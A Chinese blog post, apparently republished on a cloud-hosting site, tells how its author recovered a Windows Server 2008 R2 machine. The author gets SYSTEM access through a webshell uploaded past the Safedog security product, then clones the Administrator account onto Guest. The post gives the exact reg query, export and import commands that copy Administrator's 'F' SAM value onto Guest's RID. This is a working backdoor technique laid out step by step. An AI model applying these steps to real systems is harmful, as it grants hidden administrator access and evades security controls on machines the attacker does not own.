温馨提示×

温馨提示×

您好,登录后才能下订单哦!

密码登录×
登录注册×
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》

记一次克隆管理员的经历

发布时间:2020-06-01 19:22:27 来源:网络 阅读:1187 作者:ScreenFreezer 栏目:安全技术

半夜Server 2008R2安装MS17-010补丁时,重启系统 发现系统密码忘记了
还好本地登录的安全策略留了一个guest用户
本地搭建了DVWA WEB***测试环境 权限为system
通过漏洞上传过狗一句话***
***权限为system权限
可以创建用户 但是无法将用户添加至管理员组 估计是安全狗拦截了提权操作
随后将管理员权限克隆至login用户 登录成功

目标将把Guest提权为Administrator
查询SAM注册表下有什么配置文件
Reg query HKLM\SAM\SAM\Domains\Account\Users
记一次克隆管理员的经历
查询用户名
Reg query HKLM\SAM\SAM\Domains\Account\Users\Names
记一次克隆管理员的经历
000001F4的配置文件对应的用户为Administrator
000001F5的配置文件对应的用户为Guest
然后把注册表下的键值导出
先把Administrator的键值导出 保存到C盘名称为1.reg
Reg export HKLM\SAM\SAM\Domains\Account\Users\000001F4 c:\1.reg
再把Guest的键值导出 保存到C盘名称为2.reg
Reg export HKLM\SAM\SAM\Domains\Account\Users\000001F5 c:\2.reg

然后将1.reg “F”的键值数据复制下来 替换2.reg里面的”F”键值
记一次克隆管理员的经历
然后在把2.reg导入到注册表
Reg import c:\2.reg
最后使用guest登录
用户家目录等 都变成了Administrator的数据
实际上就是Administrator=Guest

向AI问一下细节

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

AI